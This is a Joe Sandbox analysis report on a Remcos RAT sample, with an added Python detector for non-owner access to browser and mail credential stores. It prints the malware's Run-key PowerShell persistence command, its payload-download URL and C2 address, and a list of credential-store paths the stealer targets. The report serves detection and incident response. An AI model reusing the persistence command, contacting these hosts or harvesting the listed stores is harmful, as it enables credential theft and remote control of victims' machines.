Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23232264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts (reported 2 times)
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt (reported 2 times)
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004033F0 ESMTPPassword
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 4780, type: MEMORYSTR
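The file and registry targets listed above are the standard credential stores of the Chromium-based browsers (Login Data and Web Data under the profile directory), Firefox (profiles.ini to enumerate profiles, then key4.db for the saved-login key material and places.sqlite for history) and several mail and instant-messaging clients (Outlook's OMI Account Manager, the MAPI profile store, Windows Live Mail, IncrediMail, Google Talk, Paltalk). What makes them a stealer signal is not the path alone but the accessing image: wabmig.exe owns none of them. The Python below is an added example, not part of the report; it classifies each file or registry access against a store table and flags it when the process is not one of the store's owners. The owner image names are assumptions for this example, and the IdentityCRL Dynamic Salt key is deliberately left out of the table to show that unknown keys do not fire.

```python
"""Classify file and registry accesses against known credential stores.

Added example, not part of the Joe Sandbox report. Each "File opened" /
"Key opened" line above is matched to the store it belongs to and flagged
when the accessing process is not an application that owns that store.
"""
import ntpath
import re

# (pattern on the lower-cased path, store label, images that legitimately own it)
# Owner image names are assumptions for this example.
FILE_STORES = [
    (re.compile(r"\\google\\chrome\\user data\\[^\\]+\\(login data|web data)$"),
     "Chrome credential/autofill DB", {"chrome.exe"}),
    (re.compile(r"\\microsoft\\edge\\user data\\[^\\]+\\(login data|web data)$"),
     "Edge credential/autofill DB", {"msedge.exe"}),
    (re.compile(r"\\mozilla\\firefox\\(profiles\.ini|profiles\\[^\\]+\\(key4\.db|logins\.json|places\.sqlite))$"),
     "Firefox profile store", {"firefox.exe"}),
]
REG_STORES = [
    (re.compile(r"^hkey_current_user\\software\\microsoft\\office\\outlook\\omi account manager\\accounts"),
     "Outlook account store", {"outlook.exe"}),
    (re.compile(r"^hkey_current_user\\software\\microsoft\\windows nt\\currentversion\\windows messaging subsystem\\profiles"),
     "MAPI profile store", {"outlook.exe"}),
    (re.compile(r"^hkey_current_user\\software\\microsoft\\windows live mail"),
     "Windows Live Mail store", {"wlmail.exe"}),
    (re.compile(r"^hkey_current_user\\software\\incredimail\\identities"),
     "IncrediMail identity store", {"incmail.exe"}),
    (re.compile(r"^hkey_current_user\\software\\google\\google talk\\accounts"),
     "Google Talk account store", {"googletalk.exe"}),
    (re.compile(r"^hkey_current_user\\software\\paltalk"),
     "Paltalk store", {"paltalk.exe"}),
]


def classify_access(kind, target):
    """kind is "file" or "key"; returns (label, owner_images) or None for unknown targets."""
    table = FILE_STORES if kind == "file" else REG_STORES
    normalized = target.strip().lower().rstrip("\\")
    for pattern, label, owners in table:
        if pattern.search(normalized):
            return label, owners
    return None


def flag_credential_access(events):
    """events: iterable of (image_path, kind, target). Returns (image, label, target)
    for every access to a known store by a process that does not own it."""
    findings = []
    for image_path, kind, target in events:
        hit = classify_access(kind, target)
        image = ntpath.basename(image_path).lower()
        if hit and image not in hit[1]:
            findings.append((image, hit[0], target))
    return findings


def stores_touched(findings):
    """Distinct stores reached; one process touching many stores is the stealer signal."""
    return sorted({label for _, label, _ in findings})


WABMIG = r"C:\Program Files (x86)\Windows Mail\wabmig.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed from the "File opened" / "Key opened" lines above, plus one benign control.
SAMPLE_EVENTS = [
    (WABMIG, "file", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (WABMIG, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (WABMIG, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db"),
    (WABMIG, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite"),
    (WABMIG, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (WABMIG, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\Software\Paltalk"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (WABMIG, "key", r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail"),
    (CHROME, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

if __name__ == "__main__":
    hits = flag_credential_access(SAMPLE_EVENTS)
    for image, label, target in hits:
        print(f"{image} -> {label}: {target}")
    print("distinct stores:", len(stores_touched(hits)))
```

In production the owner sets should come from the deployed software inventory rather than hard-coded names, and a single non-owner image reaching more than two or three distinct stores within seconds is the threshold worth alerting on; a backup agent touches one, a stealer touches all of them.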

Remote Access Functionality

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
Source: Yara match | File source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0042DE27 RpcBindingCreateW
MITRE ATT&CK Matrix (a number in front of a technique is the count of signatures that mapped to it; cells without a number had no hits)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 2 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 212 Process Injection | 1 Software Packing | 1 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 129 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 241 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 113 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1528523 | Sample: SecuriteInfo.com.FileRepMal... | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 100

Process tree (numbers in brackets are the graph's badge counts; see legend above):

• DNS/IP info: geoplugin.net; cmgtrading.eu
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 10 other signatures
• SecuriteInfo.com.FileRepMalware.12793.28433.exe [3 27] started
  • Created file (dropped): C:\Users\user\AppData\...\Skeletonlike.pas, ASCII
  • Signature: Suspicious powershell command line found
  • powershell.exe [20] started
    • Created files (dropped): SecuriteInfo.com.F...are.12793.28433.exe, PE32; SecuriteInfo.com.F...exe:Zone.Identifier, ASCII
    • Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
    • wabmig.exe [5 14] started
      • DNS/IP info: 107.173.4.16, 2404, 49982, 49984 AS-COLOCROSSINGUS United States; geoplugin.net 178.237.33.50, 49983, 80 ATOM86-ASATOM86NL Netherlands; cmgtrading.eu 185.26.107.57, 443, 49980, 49981 ATE-ASFR France
      • Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process
      • wabmig.exe [1] started: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
      • wabmig.exe [1] started: Tries to steal Mail credentials (via file / registry access)
      • wabmig.exe [14] started
      • cmd.exe [1] started
        • conhost.exe started
        • reg.exe [1 1] started
    • conhost.exe started

Source | Detection | Scanner | Label
SecuriteInfo.com.FileRepMalware.12793.28433.exe | 47% | ReversingLabs | Win32.Backdoor.Remcos

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe | 47% | ReversingLabs | Win32.Backdoor.Remcos
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://www.imvu.comr | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://www.imvu.com | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://login.yahoo.com/config/login | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cmgtrading.eu | 185.26.107.57 | true | false | (none) | unknown
geoplugin.net | 178.237.33.50 | true | false | (none) | unknown

Name | Malicious | Antivirus Detection | Reputation
http://cmgtrading.eu/CubBVEODo227.bin | false | (none) | unknown
https://cmgtrading.eu/CubBVEODo227.bin | false | (none) | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
107.173.4.16 | true | (none) | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.imvu.comr | wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl | wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://geoplugin.net/json.gpk | wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://cmgtrading.eu/CubBVEODo227.bin~ | wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://cmgtrading.eu/= | wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.imvu.com | wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cmgtrading.eu/CubBVEODo227.binc | wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://cmgtrading.eu/k | wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://www.imvu.coma | wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://www.nirsoft.net | wabmig.exe, 00000011.00000002.2457021842.0000000002AE4000.00000004.00000010.00020000.00000000.sdmp | false | (none) | unknown
http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.FileRepMalware.12793.28433.exe, SecuriteInfo.com.FileRepMalware.12793.28433.exe.7.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | unknown
https://www.google.com | wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cmgtrading.eu/CubBVEODo227.binzRZs | wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpR | wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://www.google.com/accounts/servicelogin | wabmig.exe | false | (none) | unknown
https://login.yahoo.com/config/login | wabmig.exe, wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ebuddy.com | wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.26.107.57 | cmgtrading.eu | France | 24935 | ATE-ASFR | false
107.173.4.16 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528523
Start date and time: 2024-10-08 00:37:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.FileRepMalware.12793.28433.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@17/14@2/3
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 221
• Number of non-executed functions: 234
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SecuriteInfo.com.FileRepMalware.12793.28433.exe
Time | Type | Description
00:40:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Markedsandel %Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)
00:40:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Markedsandel %Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)
18:38:34 | API Interceptor | 39x Sleep call for process: powershell.exe modified
18:41:00 | API Interceptor | 1658343x Sleep call for process: wabmig.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.26.107.57 | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | cmgtrading.eu/eODGqfP132.bin
185.26.107.57 | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | cmgtrading.eu/FqVHUWUBY92.bin
185.26.107.57 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | cmgtrading.eu/FqVHUWUBY92.bin
185.26.107.57 | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | cmgtrading.eu/FqVHUWUBY92.bin
185.26.107.57 | Doc_3485638568454.docx.doc | malicious | AveMaria, UACMe | zqpispa.it/
107.173.4.16 | file.exe | malicious | Remcos, GuLoader |
107.173.4.16 | 5UQ2Xybm0q.hta | malicious | Cobalt Strike, Remcos, GuLoader |
107.173.4.16 | SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe | malicious | Remcos, GuLoader |
107.173.4.16 | PO 11001 .xls | malicious | Remcos, GuLoader |
107.173.4.16 | SDWLLRJcsY.exe | malicious | Remcos, GuLoader |
107.173.4.16 | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader |
107.173.4.16 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader |
107.173.4.16 | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader |
107.173.4.16 | Mcib4Llptj.exe | malicious | Remcos |
107.173.4.16 | SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exe | malicious | Remcos |
178.237.33.50 | beNwFiUxpf.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | invoice_45009.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | HkeU5FHEO1.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Quotation request YN2024-10-07pdf.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | na.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | na.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | na.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | na.rtf | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cmgtrading.eu | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 185.26.107.57
cmgtrading.eu | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 185.26.107.57
cmgtrading.eu | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 185.26.107.57
cmgtrading.eu | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 185.26.107.57
geoplugin.net | beNwFiUxpf.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | invoice_45009.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | HkeU5FHEO1.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Quotation request YN2024-10-07pdf.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | 17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | na.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | na.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | 1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | na.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | na.rtf | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATOM86-ASATOM86NL | beNwFiUxpf.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | invoice_45009.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | HkeU5FHEO1.exe | malicious | Remcos | 178.237.33.50
